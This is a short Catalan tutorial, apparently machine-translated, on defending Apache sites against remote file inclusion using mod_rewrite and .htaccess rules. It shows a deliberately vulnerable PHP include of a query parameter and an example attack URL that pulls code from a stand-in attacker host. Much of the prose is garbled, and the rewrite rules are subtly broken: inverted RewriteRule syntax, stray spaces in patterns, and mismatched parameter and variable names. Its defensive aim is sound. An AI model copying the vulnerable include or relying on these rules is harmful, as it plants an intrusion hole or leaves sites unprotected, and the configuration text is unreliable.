Utilitzant mod_rewrite per evitar la inclusió d'arxius remots

Un dels atacs més freqüents que pateixen els llocs web es realitza mitjançant l'intent d'incloure els arxius que contenen codi maliciós, teòricament parlant d'un atac és molt senzill de realitzar, per això només perquè un arxiu que conté el codi maliciós i una URL del tipus navegador.

Aquest tipus d'atac, conegut amb el terme tècnic per a la inclusió d'arxius remots o amb les sigles simple per RFI, s'associa sovint amb una manera anomenat intrusió XSA (Cross-Server atac) generalment es fa per posar en perill la seguretat dels llocs web si no el servidor web, un factor que fa que sigui encara més perillós per RFI.

Per iniciar un atac de RFI, un atacant necessita una "memòria" dins d'una aplicació que permet que siguin de la seva inclusió de forma remota, aquest "espai" és generalment un "forat" (bug) de seguretat que fa que sigui un script vulnerable.
El cas clàssic d'una fuita sensible a la sol.licitud d'informació es relaciona amb passar la pàgina a través dels noms de variable, només un simple tros de codi com aquest per posar en perill una aplicació:

 



 # Inclou arxius a través de variables de cadena de consulta passa a través de







 include ($ _GET ['page']);

 

En el codi que tenim una variable no definida, o més aviat a ser definit d'acord amb els paràmetres enviats a través de la cadena, per exemple, si l'adreça URL directa a la pàgina amb el llistat proposat seria el següent:

 



 http://www.sito.com/index.php?pagina=news.php

 

el valor de la variable $ pàgina és igual a "Notícies" un atac a aquesta aplicació es poden executar d'aquesta manera:

 



 http://www.sito.com/index.php?pagina=http://www.attacco.com/x.php

 

L'arxiu "x.php", en el cas d'un atac reeixit, pot contenir qualsevol tipus de codi maliciós i causa molt més dany substancial i definitiva que la simplicitat dels atacs es poden fer pensar.

Afortunadament, hi ha algunes tècniques de defensa que es pot utilitzar per evitar aquests atacs, en aquest breu anàlisi analitzarem una base en el mòdul de reescriptura d'URL (mod_rewrite) proporcionada pel servidor web Apache, el qual pot ser utilitzada pels mètodes diferent.

Un dels més clàssics a enviar instruccions a un servidor web Apache és l'ús d'un arxiu clàssic. Htaccess que s'inclou en la carpeta que desitja protegir dels atacs.

El primer mètode que utilitzem és per inserir una regla simple en a. htaccess:

 RewriteCond% {QUERY_STRING} (.*)( http | https | ftp): \ / \ /(.*)







 ^(.+)$ RewriteRule - [F]

La norma estableix que va formular en una cadena de consulta ("{QUERY_STRING}") no es poden passar arguments que continguin els sufixos "http", "https" i "ftp", no importa el que el contingut de l'anterior o següent ("(.*)" ) paràmetres. Si això passa, el servidor web retornarà un error de tipus 403 (prohibit).

Aquells que tenen la possibilitat d'accés directe a l'arxiu de configuració d'Apache (httpd.conf), que pot ser inserit dins d'un únic contenidor que conté una directiva pot tenir un efecte comparable al de les normes establertes prededentemente:

 # Comproveu que mod_rewrite està disponible







 <IfModule Mod_rewrite.c>







 # Activar el motor de reescriptura d'adreces URL

 





 RewriteEngine on

 





 # Fixem la nostra regla contra RFI







 RewriteCond% {QUERY_STRING} (.*)( http | https | ftp): \ / \ /(.*)







 # Filtra les possibles sol.licituds d'inclusió i marcar







 # Vraibile amb el medi ambient [E = Värnamo: valor]







 ^(.+)$ RewriteRule - [F, E = RFI: true]

 





 </ IfModule>

 





 # Creaimo un registre dels intents de RFI que identficato







 # Anteriorment utilitzant una "variable d'entorn"







 CustomLog / nombreDeCarpeta / rfi.log combinat env = rfi

Després d'escriure la directiva en el fitxer de configuració, heu de desar els canvis i reiniciar el servidor web que tingui efecte, tingui en compte que al final de la llista, i fora dels contenidors s'ha introduït la sol.licitud per a la creació d'un arxiu de registre destina a registrar les sol ‡ licituds d'inclusió d'arxius remots, el control d'aquest petit ", assenyala el bloqueig d'atacs de RFI," anem a descobrir que els intents d'inclusió d'arxius remots als nostres llocs web són menys comuns que creu.